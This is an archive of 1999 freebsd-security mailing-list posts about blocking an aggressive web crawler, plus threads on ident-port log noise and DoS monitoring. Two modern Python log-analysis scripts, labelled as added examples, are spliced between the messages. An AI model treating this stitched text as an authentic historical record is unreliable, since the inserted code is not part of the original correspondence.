The main problem is the same as for spammers. It is an opt-out list, not an opt-in one. That makes them VERY bad in my list.
--
Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr
FreeBSD keltia.freenix.fr 4.0-CURRENT #71: Sun May 9 20:16:32 CEST 1999

From owner-freebsd-security Sun May 23 20: 9:20 1999
From: "Kenneth D. Merry"
Message-Id: <199905240308.VAA22141@panzer.plutotech.com>
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <19990523185630.A57604@ontario.mooseriver.com> from Josef Grosch at "May 23, 1999 06:56:30 pm"
To: jgrosch@MooseRiver.com
Date: Sun, 23 May 1999 21:08:52 -0600 (MDT)
Cc: root@Rigel.orionsys.com (David Babler), fbsd-security@ursine.com (Michael Bryan), freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL54 (25)]

Josef Grosch wrote...
> On Sun, May 23, 1999 at 06:11:28PM -0700, David Babler wrote:
> >
> >
> > On Sun, 23 May 1999, Michael Bryan wrote:
> > > On 5/23/99 at 1:23 PM Brett Glass wrote:
> > > >I don't know whether or not this would help. But complaining to their
> > > >ISP probably would.
> > >
> > > Or to them directly...
> > >
> > > Some things I noted about their scans in our log files:
> > >
> > > 1) They -are- requesting a robots.txt file before every scan wave.
> > > Whether or not they utilize this, I cannot tell, as we don't have
> > > a robots.txt file in use at this time.
> >
> > They get it, and ignore it. They're just sucking up all files they see,
> > since, as I said, I have webpoison installed. Webpoison is intended to
> > befuddle brain-dead spam address harvesters by generating an infinite
> > number of "interesting" pseudo-random web pages containing what look like
> > more links (more webpoison pages) and email addresses (all bogus). The
> > links on the page are invisible to humans and included in the robots.txt
> > file, so legitimate robots never should go there. Our imagelock.com
> > friends spent a LONG time there.
>
> Where can one find webpoison? All the web servers I run, including my
> little test server on my home machine, have been scanned by imagelock.com.
I did a search on Yahoo and came up with what seems to be the home page:

http://www.e-scrub.com/wpoison/

They've got some guidelines there for installing and using it. It looks quite interesting.

I checked a web server I administer, and sure enough, it got hit by imagelock.com two days ago. I may just firewall them. :)

Ken
--
Kenneth Merry
ken@plutotech.com

From owner-freebsd-security Sun May 23 20:45:21 1999
Message-ID: <3748C9E0.FEF70C3@pacbell.net>
Date: Sun, 23 May 1999 20:39:12 -0700
From: Alex
X-Mailer: Mozilla 4.51 [en] (WinNT; U)
To: Roger Marquis
Cc: security@FreeBSD.ORG, firewall-wizards@nfr.net
Subject: you should post this on ntsecurity@iss.net

I think you will find some friends there, the good kind.

Alex

Roger Marquis wrote:
> On Sat, May 22, 1999 at 06:40:20PM -0700, David Babler wrote:
> > > On Sat, May 22, 1999 at 11:05:28AM -0600, Brett Glass wrote:
> > > > This morning, someone at the domain "imagelock.com" apparently launched a
> > > > denial of service attack against a Web server I administer. The abuser was
> > > imagelock.com has been banned from my web servers ever since they
> > > initiated a DoS attack against me a few months ago. Basically, they
> > > download every accessible file on a website. The company's MO is to
> >
> > Their web client also gleefully ignores robots.txt as well, and spent 2
> > hours here chasing web poisoned pages - apparently quitting only when it
> > didn't find any images to fingerprint. So they're now blocked here at the
> > firewall too - thanks for the heads-up. Wonder how much they can sell
> > their service for when they find they don't have access to poke around?
>
> Great information! Thanks Brett. I checked our httpd logs and
> immediately found several thousand hits from this subnet, which is now
> filtered.
>
> Imagelock could be another name for Cyveillance.com. We saw an
> identical pattern 2 months ago from another IP which had/has no reverse
> DNS. The domain turned out to be Cyveillance and their ISP was (at the
> time) Digex.net who forwarded our complaint and followed up twice.
> Thank you Digex!
>
> After 3 complaints to Digex and Cyveillance we finally received this
> response from Cyveillance:
>
> > Recently Digex, our internet provider, forwarded your inquiry regarding
> > visits to your site from 207.87.178.66.
> >
> > We provide companies with brand protection services on the internet. To
> > accomplish this goal we employ search engines / web crawlers to scan the
> > internet. We are in no way involved with the creation of unsolicited
> > commercial email. Please see our web site at http://www.cyveillance.com
> > where you can learn more about our company and what we do.
> >
> > It appears we crawled your web site as part of our general web search, and
> > crawled your mailto directories as part of that search. We hope we didn't
> > cause you any inconvenience.
> >
> > If you have any questions, don't hesitate to contact me.
> >
> > Paul K. Witting
> > Manager of Information Systems
> > Cyveillance - Intelligent Internet Surveillance
> > PWitting@Cyveillance.com
> > (703) 519-4212
>
> However they never did stop scanning our subnets until we filtered
> their subnet at 207.87.178.
>
> This subnet still has no reverse DNS however `whois` shows Cyveillance
> is now a customer of imaphost.com and namesecure.com. "imaphost.com"
> is already in our IP filter list (all 27 lines of it) for previous HTTP
> abuses however namesecure.com is not.
>
> Call me paranoid but it sure looks like another Cyveillance attempt to
> cover their tracks.
>
> --
> Roger Marquis
> Roble Systems Consulting
> http://www.roble.com/
>
> -
> [To unsubscribe, send mail to majordomo@lists.gnac.net with
> "unsubscribe firewalls" in the body of the message.]
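Brett's advice to grep the httpd logs for the crawler, and Roger's report of finding thousands of hits from one subnet, can be turned into a repeatable check. The script below is an added example and is not code from any poster on this thread: it parses Apache common-log lines, reports whether each client fetched robots.txt and then went on to request paths that robots.txt disallows (the pattern Babler describes with wpoison), and gives each client's peak request rate. The log lines, the client addresses and the /wpoison/ Disallow prefix are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache common log format: host ident user [time] "request" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Assumption: these are the path prefixes our robots.txt lists under Disallow
# (a wpoison-style trap directory, as described in the thread).
DISALLOWED = ("/wpoison/",)

# Constructed sample log: 203.0.113.5 fetches robots.txt and then walks into the
# disallowed directory at 10-second intervals; 198.51.100.7 behaves.
SAMPLE_LOG = """\
203.0.113.5 - - [23/May/1999:18:01:00 -0700] "GET /robots.txt HTTP/1.0" 200 58
203.0.113.5 - - [23/May/1999:18:01:10 -0700] "GET /index.html HTTP/1.0" 200 2048
203.0.113.5 - - [23/May/1999:18:01:20 -0700] "GET /wpoison/a1.html HTTP/1.0" 200 1331
203.0.113.5 - - [23/May/1999:18:01:30 -0700] "GET /wpoison/b7.html HTTP/1.0" 200 1298
203.0.113.5 - - [23/May/1999:18:01:40 -0700] "GET /wpoison/c3.html HTTP/1.0" 200 1402
198.51.100.7 - - [23/May/1999:18:05:00 -0700] "GET /robots.txt HTTP/1.0" 200 58
198.51.100.7 - - [23/May/1999:18:05:02 -0700] "GET /index.html HTTP/1.0" 200 2048
198.51.100.7 - - [23/May/1999:18:06:30 -0700] "GET /about.html HTTP/1.0" 200 900
""".splitlines()


def parse_line(line):
    """Parse one common-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "host": m["host"],
        "when": datetime.strptime(m["time"], "%d/%b/%Y:%H:%M:%S %z"),
        "path": m["path"],
    }


def peak_in_window(times, window=timedelta(seconds=60)):
    """Largest number of requests that fall inside any sliding window."""
    times = sorted(times)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyze(lines, disallowed=DISALLOWED, window=timedelta(seconds=60)):
    """Per-host summary: whether it fetched robots.txt, how many requests it
    made into Disallow'ed paths afterwards, and its peak requests per window."""
    by_host = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_host[rec["host"]].append(rec)
    report = {}
    for host, recs in by_host.items():
        recs.sort(key=lambda r: r["when"])
        robots_at = next((r["when"] for r in recs if r["path"] == "/robots.txt"), None)
        violations = 0
        if robots_at is not None:
            # Only requests made after reading robots.txt count as ignoring it.
            violations = sum(
                1 for r in recs
                if r["when"] > robots_at and r["path"].startswith(disallowed)
            )
        report[host] = {
            "fetched_robots": robots_at is not None,
            "disallowed_after_robots": violations,
            "peak_per_window": peak_in_window([r["when"] for r in recs], window),
            "total": len(recs),
        }
    return report


def flagged_hosts(report):
    """Hosts that read robots.txt and then requested disallowed paths anyway."""
    return sorted(h for h, s in report.items()
                  if s["fetched_robots"] and s["disallowed_after_robots"] > 0)


if __name__ == "__main__":
    rep = analyze(SAMPLE_LOG)
    for host in flagged_hosts(rep):
        s = rep[host]
        print(f"{host}: {s['total']} requests, {s['disallowed_after_robots']} into "
              f"disallowed paths after fetching robots.txt, peak {s['peak_per_window']}/min")
```

Feed it a real access_log and a list of the prefixes your own robots.txt disallows; a host that appears in the flagged list is a candidate for the filtering steps discussed later in the thread.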
From owner-freebsd-security Sun May 23 20:50:32 1999
Date: Mon, 24 May 1999 13:21:16 +0930 (CST)
From: Kris Kennaway
To: Unknow User
Cc: freebsd-security@freebsd.org
Subject: Re: user uses xv3.10a (PNG) to halt my system.
In-Reply-To: <3740B863.6C20B59E@tdnet.com.br>

On Mon, 17 May 1999, Unknow User wrote:

> probably, this is not the most suitable mailing list to post this message,
> but it's not worth subscribing to fbsd-questions only to get an answer. (if
> you hate me for that, ignore me)

This question was already answered on freebsd-hackers. Why are you asking again here?

Kris

> Gustavo Rios

-----
"That suit's sharper than a page of Oscar Wilde witticisms that's been rolled up into a point, sprinkled with lemon juice and jabbed into someone's eye"
"Wow, that's sharp!"
- Ace Rimmer and the Cat, _Red Dwarf_

From owner-freebsd-security Sun May 23 20:51: 7 1999
Message-Id: <199905240350.VAA16498@harmony.village.org>
To: "Kenneth D. Merry"
Subject: Re: Denial of service attack from "imagelock.com"
Cc: freebsd-security@FreeBSD.ORG
In-reply-to: Your message of "Sun, 23 May 1999 21:08:52 MDT."
<199905240308.VAA22141@panzer.plutotech.com>
References: <199905240308.VAA22141@panzer.plutotech.com>
Date: Sun, 23 May 1999 21:50:09 -0600
From: Warner Losh

In message <199905240308.VAA22141@panzer.plutotech.com> "Kenneth D. Merry" writes:
: I checked a web server I administer, and sure enough, it got hit by
: imagelock.com two days ago. I may just firewall them. :)

We got hit as well. Since we're behind an ISDN line, they are history and now well filtered. Bastards.

Warner

From owner-freebsd-security Sun May 23 22: 0:22 1999
Date: Mon, 24 May 1999 02:00:12 -0300 (ADT)
From: Michael Richards <026809r@dragon.acadiau.ca>
To: Brett Glass
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
In-Reply-To: <4.2.0.37.19990523191423.04639500@localhost>

On Sun, 23 May 1999, Brett Glass wrote:

> The Webmasters on this list may want to look over their logs to see
> if they've been hit and not known it. grep your logs for imagelock.com;
> if you find that they're abusing your server, you may want to firewall

I noticed we were hit by them this evening. 1250 requests in a few minutes. Since we're not running a firewall, is there a recommended method of filtering such people out? I think I did it with apache, but I'm wondering if there is a better method.

-Michael

From owner-freebsd-security Sun May 23 22: 6:46 1999
Message-Id: <4.1.19990524165706.00a63150@pern.csarc.otago.ac.nz>
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1
Date: Mon, 24 May 1999 16:59:55 +1200
To: freebsd-security@FreeBSD.ORG
From: Drew Whittle
Subject: Re: Denial of service attack from "imagelock.com"
References: <4.2.0.37.19990523191423.04639500@localhost>

Hi Everyone,

I have had my fill of imagelock.com. Could everyone who has been hit by them email me privately and let me know what impact it has had on you? (I'm going to collate it all, and see if I can use it to get them to stop.)

Also if you know of others who have been hit by this that aren't on the list, please ask them to email me with details. (No I do _NOT_ want 6 Gig of logs in my mail box!)

Regards,

Drew

From owner-freebsd-security Sun May 23 22: 8: 1 1999
Message-Id: <4.2.0.37.19990523230210.0457f8a0@localhost>
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Sun, 23 May 1999 23:05:15 -0600
To: Michael Richards <026809r@dragon.acadiau.ca>
From: Brett Glass
Subject: Re: Denial of service attack from "imagelock.com"
Cc: freebsd-security@FreeBSD.ORG
References: <4.2.0.37.19990523191423.04639500@localhost>

Without a firewall either internally or externally, your best bet is to put "deny from 209.133.111" in your .htaccess file or in Apache's access.conf file. You should also complain to dlr@above.net and abuse@above.net. Include some log excerpts to show the nature of the attack.

--Brett

At 02:00 AM 5/24/99 -0300, Michael Richards wrote:
>On Sun, 23 May 1999, Brett Glass wrote:
>
> > The Webmasters on this list may want to look over their logs to see
> > if they've been hit and not known it. grep your logs for imagelock.com;
> > if you find that they're abusing your server, you may want to firewall
>I noticed we were hit by them this evening. 1250 requests in a few
>minutes. Since we're not running a firewall, is there a recommended method
>of filtering such people out? I think I did it with apache, but I'm
>wondering if there is a better method.
>
>-Michael

From owner-freebsd-security Sun May 23 23:39:34 1999
To: Michael Richards <026809r@dragon.acadiau.ca>
Cc: Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
In-reply-to: Your message of "Mon, 24 May 1999 02:00:12 -0300."
Date: Mon, 24 May 1999 08:39:26 +0200
Message-ID: <11146.927527966@critter.freebsd.dk>
From: Poul-Henning Kamp

In message , Michael Richards writes:
>On Sun, 23 May 1999, Brett Glass wrote:
>
>> The Webmasters on this list may want to look over their logs to see
>> if they've been hit and not known it. grep your logs for imagelock.com;
>> if you find that they're abusing your server, you may want to firewall
>I noticed we were hit by them this evening. 1250 requests in a few
>minutes. Since we're not running a firewall, is there a recommended method
>of filtering such people out? I think I did it with apache, but I'm
>wondering if there is a better method.

Add a blackhole route to them:

	route add -net -netmask 127.0.0.1 -blackhole

--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon May 24 0:41: 1 1999
Date: Mon, 24 May 1999 00:40:09 -0700
From: Gregory Sutter
To: Josef Grosch
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
Message-ID: <19990524004009.I93974@001101.zer0.org>
References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <19990523185630.A57604@ontario.mooseriver.com>
In-Reply-To: <19990523185630.A57604@ontario.mooseriver.com>; from Josef Grosch on Sun, May 23, 1999 at 06:56:30PM -0700
X-Mailer: Mutt 0.95.4i
Organization: Zer0

On Sun, May 23, 1999 at 06:56:30PM -0700, Josef Grosch wrote:
>
> Where can one find webpoison? All the web servers I run, including my
> little test server on my home machine, have been scanned by imagelock.com.

wpoison, not webpoison, may be found at . It compiles cleanly on 2.x and 3.x and is easy to configure by modifying bits of source.

Greg
--
Gregory S. Sutter                      Cole's Law: Thinly sliced cabbage.
mailto:gsutter@pobox.com
http://www.pobox.com/~gsutter/
PGP DSS public key 0x40AE3052

From owner-freebsd-security Mon May 24 0:59:54 1999
Message-ID: <01BEA5CD.798B3EC0@theo.tepucom.nl>
From: Theo Purmer
To: "'freebsd-security@FreeBSD.ORG'"
Subject: why not take this a little further (proposal)
Date: Mon, 24 May 1999 10:09:11 +-200

There have been a lot of postings about that imagelock DoS attack.

Why not take this a little further and set up a "place" where these forms of abuse can be reported and are monitored. When found to be abusive, (sub)nets can then be added to a list which is periodically distributed to update the ipfw scripts of subscribers.

I know there are a lot of security issues surrounding this but I think it should be possible.

Also if enough firewalls are frequently updated with this list one would not like his/her (sub)net on the list so maybe people think twice before doing what imagelock is doing.

Theo Purmer
Tepucom

From owner-freebsd-security Mon May 24 1: 5: 5 1999
To: Theo Purmer
Cc: "'freebsd-security@FreeBSD.ORG'"
Subject: Re: why not take this a little further (proposal)
In-reply-to: Your message of "Mon, 24 May 1999 10:09:11."
<01BEA5CD.798B3EC0@theo.tepucom.nl>
Date: Mon, 24 May 1999 10:04:57 +0200
Message-ID: <11495.927533097@critter.freebsd.dk>
From: Poul-Henning Kamp

Far more efficiently: use BGP routes like MAPS does.

Poul-Henning

In message <01BEA5CD.798B3EC0@theo.tepucom.nl>, Theo Purmer writes:
>There have been a lot of postings about that
>imagelock DoS attack.
>
>Why not take this a little further and set up a "place"
>where these forms of abuse can be reported and
>are monitored. When found to be abusive, (sub)nets
>can then be added to a list which is periodically
>distributed to update the ipfw scripts of subscribers.
>
>I know there are a lot of security issues surrounding this
>but I think it should be possible.
>
>Also if enough firewalls are frequently updated with this list
>one would not like his/her (sub)net on the list so maybe people
>think twice before doing what imagelock is doing
>
>Theo Purmer
>Tepucom
>
--
Poul-Henning Kamp             FreeBSD coreteam member
phk@FreeBSD.ORG               "Real hackers run -current on their laptop."
FreeBSD -- It will take a long time before progress goes too far!

From owner-freebsd-security Mon May 24 5:12:31 1999
To: "Bert Kellerman"
Cc: "Matthew Dillon"
Subject: Re: Denial of service attack from "imagelock.com"
References: <4.2.0.37.19990522105949.0465d4a0@localhost> <199905221714.KAA74179@apollo.backplane.com> <009401bea570$09546a80$5f64a8c0@crackhouse.com>
From: Dag-Erling Smorgrav
Date: 24 May 1999 14:12:22 +0200
In-Reply-To: "Bert Kellerman"'s message of "Sun, 23 May 1999 19:00:21 -0400"
X-Mailer: Gnus v5.5/Emacs 19.34

"Bert Kellerman" writes:
> You need UDP connectivity to perform a successful traceroute from a UNIX
> client..not TCP. [...]

Bullshit. RTFM.

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Mon May 24 6:44:46 1999
Message-ID: <37492DE5.2822267@domain.com.br>
Date: Mon, 24 May 1999 10:45:57 +0000
From: Joao Assad
X-Mailer: Mozilla 4.08 [en] (X11; I; FreeBSD 3.2-STABLE i386)
To: freebsd-security@FreeBSD.ORG
Subject: Re: Denial of service attack from "imagelock.com"
References: <199905231424140440.0E81E3D5@quaggy.ursine.com> <4.2.0.37.19990523191423.04639500@localhost>

Brett Glass wrote:
> At 06:11 PM 5/23/99 -0700, David Babler wrote:
>
> >They get it, and ignore it. They're just sucking up all files they see,
> >since, as I said, I have webpoison installed. Webpoison is intended to
> >befuddle brain-dead spam address harvesters by generating an infinite
> >number of "interesting" pseudo-random web pages containing what look like
> >more links (more webpoison pages) and email addresses (all bogus). The
> >links on the page are invisible to humans and included in the robots.txt
> >file, so legitimate robots never should go there. Our imagelock.com
> >friends spent a LONG time there.
>
> Dave, could you write the people at noc@above.net and abuse@above.net
> and tell them that? Ignoring the robots.txt file amounts to unauthorized
> access -- big time. That's serious Web abuse.
>
> The Webmasters on this list may want to look over their logs to see
> if they've been hit and not known it. grep your logs for imagelock.com;
> if you find that they're abusing your server, you may want to firewall
> them out and complain to ABOVE.NET.

Damn, they scanned all my servers. I didn't check before because I thought they wouldn't be interested in a .br server.... Seems like they got here coming through our tucows mirror, and once they got in our network they started scanning all our servers. In my logs I see a 10 secs interval between each request.
Cheers

Joao Assad

From owner-freebsd-security Mon May 24 6:48:28 1999
Message-ID: <013a01bea5ec$0a572220$380051c2@greg.qmpgmc.ac.uk>
Reply-To: "Greg Quinlan"
From: "Greg Quinlan"
Subject: Re: Server trying to connect to Port 113
Date: Mon, 24 May 1999 14:48:01 +0100
X-Mailer: Microsoft Outlook Express 4.72.2106.4

Thanks

So will it affect anything by opening port 113? ...(getting 2000 or so log entries from the same server)

Greg

(ps. Remember to reply all, not on the list)

-----Original Message-----
From: Jan B. Koum
To: Greg Quinlan ; freebsd-security@FreeBSD.ORG
Date: 23 May 1999 12:55
Subject: Re: Server trying to connect to Port 113

>On Fri, May 21, 1999 at 09:31:37AM +0100, Greg Quinlan wrote:
>> I am not on the mailing list so please include me in your reply.
>>
>> Can someone explain what this remote system is trying to do?
>>
>> May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP :1937 > ip>:113 in via fxp1
>> May 21 09:22:35 amanda last message repeated 3 times
>>
>> Extract from /etc/services
>>
>> auth 113/tcp ident tap #Authentication Service
>> auth 113/udp ident tap #Authentication Service
>>
>> Greg
>
> Might be sendmail on going back into your box to get
>ident info. Or this might be provoked by something else - like tcp
>wrappers, irc, etc, etc...
>
>-- Yan
>

From owner-freebsd-security Mon May 24 7: 1:50 1999
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 563C3153BE for ; Mon, 24 May 1999 07:01:46 -0700 (PDT) (envelope-from des@flood.ping.uio.no)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.1) id QAA90196; Mon, 24 May 1999 16:01:30 +0200 (CEST) (envelope-from des)
To: "Greg Quinlan"
Cc:
Subject: Re: Server trying to connect to Port 113
References: <013a01bea5ec$0a572220$380051c2@greg.qmpgmc.ac.uk>
From: Dag-Erling Smorgrav
Date: 24 May 1999 16:01:30 +0200
In-Reply-To: "Greg Quinlan"'s message of "Mon, 24 May 1999 14:48:01 +0100"
Message-ID:
Lines: 11
X-Mailer: Gnus v5.5/Emacs 19.34
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Greg Quinlan" writes:
> So will it affect anything by opening port 113? ...(getting 2000 or so log
> entries from the same server)

Don't log, or at least, don't log connections to ports to which you
expect benign (if misguided) traffic, such as auth and the netbios
ports.

DES
--
Dag-Erling Smorgrav - des@flood.ping.uio.no

From owner-freebsd-security Mon May 24 7: 7:55 1999
Delivered-To: freebsd-security@freebsd.org
Received: from www.netlabs.net (www.netlabs.net [216.116.128.3]) by hub.freebsd.org (Postfix) with ESMTP id 05B69153E7 for ; Mon, 24 May 1999 07:07:12 -0700 (PDT) (envelope-from keerf@www.netlabs.net)
Received: (from keerf@localhost) by www.netlabs.net (8.9.2/8.9.0) id KAA02587 for freebsd-security@FreeBSD.ORG; Mon, 24 May 1999 10:07:11 -0400 (EDT)
Date: Mon, 24 May 1999 10:07:11 -0400 (EDT)
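A middle ground between "don't log those ports" and "every NetBIOS hit is a break-in", as an added example that is not code from anyone in this thread: keep logging, but triage the denials by destination port so ident and NetBIOS noise is counted in aggregate and only unexpected ports are read line by line. It assumes the FreeBSD 3.x ipfw syslog layout quoted earlier in the thread, and the sample lines and addresses are constructed.

```python
"""Triage ipfw deny-log lines by destination port.

Added example, not from the thread. Denials to ports where unsolicited
but benign traffic is expected (ident/auth 113, NetBIOS 137-139, as
discussed above) are counted separately from everything else.
Assumed log layout (FreeBSD 3.x ipfw via syslog):
  <ts> <host> /kernel: ipfw: <rule> <action> <proto> <src>:<sport> <dst>:<dport> <in|out> via <if>
"""
import re
from collections import Counter

# Ports the thread names as sources of benign (if misguided) inbound noise.
EXPECTED_NOISE_PORTS = {
    113: "ident/auth (sendmail, tcp wrappers, irc looking up the connecting user)",
    137: "NetBIOS name service",
    138: "NetBIOS datagram service",
    139: "NetBIOS session service",
}

IPFW_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ [\d:]+) (?P<host>\S+) /kernel: ipfw: (?P<rule>\d+) "
    r"(?P<action>\w+) (?P<proto>\w+) (?P<src>[\d.]+):(?P<sport>\d+) "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<dir>in|out) via (?P<iface>\S+)$"
)
# syslog collapses identical consecutive messages into this line
REPEAT_RE = re.compile(r"^\w{3} +\d+ [\d:]+ \S+ last message repeated (?P<n>\d+) times$")


def parse_ipfw_log(lines):
    """Yield (src, dport, proto, count) per entry, crediting each
    'last message repeated N times' line to the entry it follows."""
    last = None
    for line in lines:
        line = line.rstrip("\n")
        m = IPFW_RE.match(line)
        if m:
            last = (m["src"], int(m["dport"]), m["proto"].upper())
            yield last + (1,)
            continue
        r = REPEAT_RE.match(line)
        if r and last is not None:
            yield last + (int(r["n"]),)
        # other kernel messages are ignored


def triage(lines):
    """Return {'noise': Counter{(src, port): n}, 'review': Counter{(src, port): n}}."""
    result = {"noise": Counter(), "review": Counter()}
    for src, dport, proto, count in parse_ipfw_log(lines):
        bucket = "noise" if dport in EXPECTED_NOISE_PORTS else "review"
        result[bucket][(src, dport)] += count
    return result


def summarize(lines):
    """One report line per (source, port), noisiest first; expected ports are labelled."""
    t = triage(lines)
    out = []
    for (src, port), n in sorted(t["noise"].items(), key=lambda kv: -kv[1]):
        out.append(f"noise   {src:>15} -> {port:<5} x{n:<4} {EXPECTED_NOISE_PORTS[port]}")
    for (src, port), n in sorted(t["review"].items(), key=lambda kv: -kv[1]):
        out.append(f"REVIEW  {src:>15} -> {port:<5} x{n}")
    return "\n".join(out)


# Constructed sample log; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = """\
May 21 09:22:14 amanda /kernel: ipfw: 24110 Deny TCP 198.51.100.7:1937 192.0.2.10:113 in via fxp1
May 21 09:22:35 amanda last message repeated 3 times
May 21 09:23:02 amanda /kernel: ipfw: 24110 Deny UDP 203.0.113.5:137 192.0.2.10:137 in via fxp1
May 21 09:23:40 amanda /kernel: ipfw: 24110 Deny TCP 203.0.113.5:2048 192.0.2.10:139 in via fxp1
May 21 09:24:11 amanda /kernel: ipfw: 24110 Deny TCP 203.0.113.9:3111 192.0.2.10:23 in via fxp1
May 21 09:24:12 amanda last message repeated 12 times
May 21 09:25:00 amanda /kernel: some unrelated kernel message
""".splitlines()

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))
```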
From: Terry Warner
Message-Id: <199905241407.KAA02587@www.netlabs.net>
To: freebsd-security@FreeBSD.ORG
Subject: Monitoring
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Can anyone recommend a good system monitor .. for like detecting DoS
attacks and such .. and which can log to files? If so please get back
to me ..

Thank you
Terry Warner

From owner-freebsd-security Mon May 24 7:17:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 6ABE314BD3 for ; Mon, 24 May 1999 07:16:14 -0700 (PDT) (envelope-from kiril@idea.co.uk)
Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id PAA02162; Mon, 24 May 1999 15:07:14 +0100 (BST)
From: Kiril Mitev
Message-Id: <199905241407.PAA02162@idea.co.uk>
Subject: Re: Denial of service attack from "imagelock.com"
To: brett@lariat.org (Brett Glass)
Date: Mon, 24 May 1999 15:07:14 +0100 (BST)
Cc: freebsd-security@freebsd.org
In-Reply-To: <4.2.0.37.19990522171752.04638eb0@localhost> from "Brett Glass" at May 22, 99 05:24:16 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>
> At 11:29 AM 5/22/99 -0700, Rodney W. Grimes wrote:
>
> >Did you even try the simple way:
> >
>
> Yes, I did. Unfortunately, there's no way of telling whether the
> company is what it says it is or why it would have attempted to
> hit the server with so many rapid-fire requests from multiple IP
> addresses. I've been trying to contact the company and hopefully
> we will know soon. However, in the meantime, I'd STRONGLY recommend
> that people firewall its IPs -- 209.133.111/24. At best, they're
> terribly misguided; at worst, they're outright malicious.

3rd option: they/you/both have a slow line, and someone was in a hurry
to suck your whole web site... by running several copies of a web
crawler or something.

i've had to slap people on the wrist for that before :-), since OUR
firewall/proxy starts buckling under such a load....
just my tuppence

Kiril

>
> --Brett Glass
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

From owner-freebsd-security Mon May 24 7:32:35 1999
Delivered-To: freebsd-security@freebsd.org
Received: from idea.co.uk (ultra2.idea.co.uk [194.36.20.11]) by hub.freebsd.org (Postfix) with ESMTP id 1C32314BD3 for ; Mon, 24 May 1999 07:31:12 -0700 (PDT) (envelope-from kiril@idea.co.uk)
Received: (from kiril@localhost) by idea.co.uk (8.9.2/8.9.2) id PAA02615; Mon, 24 May 1999 15:22:29 +0100 (BST)
From: Kiril Mitev
Message-Id: <199905241422.PAA02615@idea.co.uk>
Subject: Re: Server trying to connect to Port 113
To: des@flood.ping.uio.no (Dag-Erling Smorgrav)
Date: Mon, 24 May 1999 15:22:29 +0100 (BST)
Cc: greg@qmpgmc.ac.uk, freebsd-security@FreeBSD.ORG
In-Reply-To: from "Dag-Erling Smorgrav" at May 24, 99 04:01:30 pm
X-Mailer: ELM [version 2.4 PL25]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>
> "Greg Quinlan" writes:
> > So will it affect anything by opening port 113? ...(getting 2000 or so log
> > entries from the same server)
>
> Don't log, or at least, don't log connections to ports to which you
> expect benign (if misguided) traffic, such as auth and the netbios
> ports.

i beg to disagree, any access attempt from 'outside' to any netbios
ports is 99% indicative of a break-in attempt.

in my experience, at least

K

>
> DES
> --
> Dag-Erling Smorgrav - des@flood.ping.uio.no
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

From owner-freebsd-security Mon May 24 7:38:34 1999
Delivered-To: freebsd-security@freebsd.org
Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46]) by hub.freebsd.org (Postfix) with ESMTP id AE73214BD3 for ; Mon, 24 May 1999 07:38:26 -0700 (PDT) (envelope-from ark@eltex.ru)
Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id SAA29914; Mon, 24 May 1999 18:38:08 +0400 (MSD)
Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Mon, 24 May 1999 18:37:34 +0400
Received: from undisclosed-intranet-sender id xma014994; Mon, 24 May 99 18:37:30 +0400
Date: Mon, 24 May 1999 18:37:21 +0400
Message-Id: <199905241437.SAA23349@paranoid.eltex.spb.ru>
In-Reply-To: <199905241422.PAA02615@idea.co.uk> from "Kiril Mitev " 
From: ark@eltex.ru
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: Server trying to connect to Port 113
To: kiril@ideaglobal.com
